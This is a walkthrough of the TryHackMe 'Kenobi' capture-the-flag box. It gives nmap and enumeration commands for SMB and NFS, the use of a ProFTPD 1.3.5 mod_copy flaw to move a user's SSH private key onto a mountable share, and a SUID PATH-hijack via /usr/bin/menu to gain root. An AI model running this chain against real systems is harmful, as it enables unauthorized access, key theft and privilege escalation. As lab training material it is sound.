Help Me, Obi-Wan Kenobi. You're My Only Hope: Navigating the Kenobi CTF on TryHackMe
This walkthrough will cover the Kenobi CTF found on TryHackMe. It will include accessing a Samba share, exploiting a vulnerable version of ProFtpd to gain initial access, and escalating privileges to root using a SUID binary.
Step 1: Nmap
nmap -A -p- -T4 10.10.117.14 -vvv
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
| 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100005 1,2,3 51719/udp6 mountd
| 100005 1,2,3 55558/udp mountd
| 100005 1,2,3 59043/tcp mountd
| 100005 1,2,3 60167/tcp6 mountd
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl syn-ack ttl 61 2-3 (RPC #100227)
34619/tcp open nlockmgr syn-ack ttl 61 1-4 (RPC #100021)
46053/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)
59043/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)
60883/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=7/7%OT=21%CT=1%CU=40628%PV=Y%DS=4%DC=T%G=Y%TM=64A89F2C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%II=I%TS=8)SEQ(SP=10
OS:1%GCD=1%ISR=10A%TI=Z%II=I%TS=8)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=I%II=I%T
OS:S=8)SEQ(SP=101%GCD=2%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M509ST11NW7%O2=M509ST
OS:11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=6
OS:8DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M
OS:509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.003 days (since Fri Jul 7 17:22:14 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 2s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KENOBI<00> Flags: <unique><active>
| KENOBI<03> Flags: <unique><active>
| KENOBI<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time:
| date: 2023-07-07T23:26:33
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2023-07-07T18:26:33-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 18419/tcp): CLEAN (Couldn't connect)
| Check 2 (port 14290/tcp): CLEAN (Couldn't connect)
| Check 3 (port 27356/udp): CLEAN (Failed to receive data)
| Check 4 (port 22821/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
This box contains multiple attack vectors to help enumerate and gather useful information to gain our initial foothold. To begin, we will focus on port 445, SMB.
Step 2: Enumerate SMB
Using nmap scripts we can further enumerate port 445 to find available shares.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-user.nse 10.10.165.161
There are a total of 3 shares. Let's connect to one of them using smbclient
.
smbclient //10.10.165.161/anonymous
Upon connecting, we discover a log.txt
file. We can pull this down using the smbget
command.
smbget -R smb://10.10.165.161/anonymous
Step 3: Enumerate NFS
Similar to SMB, we can use nmap scripts to further enumerate NFS.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.165.161
We discover /var
is a mountable network drive.
Step 4: ProFtpd
Using netcat we can determine what version of ProFtpd is running.
nc 10.10.165.161 21
Let's use searchsploit
to see if this version has a vulnerability.
searchsploit ProFtpd 1.3.5
Looks like there is a Metasploit module called mod_copy
. But let's do this the manual way using netcat.
What we did was move the private key over to /var
since we discovered that was the mount point during our SMB enumeration. Let's mount to the /var/tmp
directory now.
mkdir /mnt/kenobiNFS
mount 10.10.165.161:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
We now have the network mounted on our attack box. Let's pull down the id_rsa
SSH key and use it to connect to the box using Kenobi's account.
We're in! You'll find your first flag at /home/kenobi/user.txt
.
Step 5: Privesc and Root
Let's search the system for a binary running elevated permissions.
find / -perm -u=s -type f 2>/dev/null
The binary /usr/bin/menu
is not ordinary and can be used for elevating privileges. Let's move it over to the /tmp
directory since we know it's writable. From there we can change the name of /bin/sh
to curl
and give it the appropriate permissions to run. From there we will put it on the same path as /tmp
.
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
And we have root! Type cat /root/root.txt
and you'll find your last flag.
I hope you enjoyed this walkthrough of the Kenobi CTF found on TryHackMe. Happy Hacking.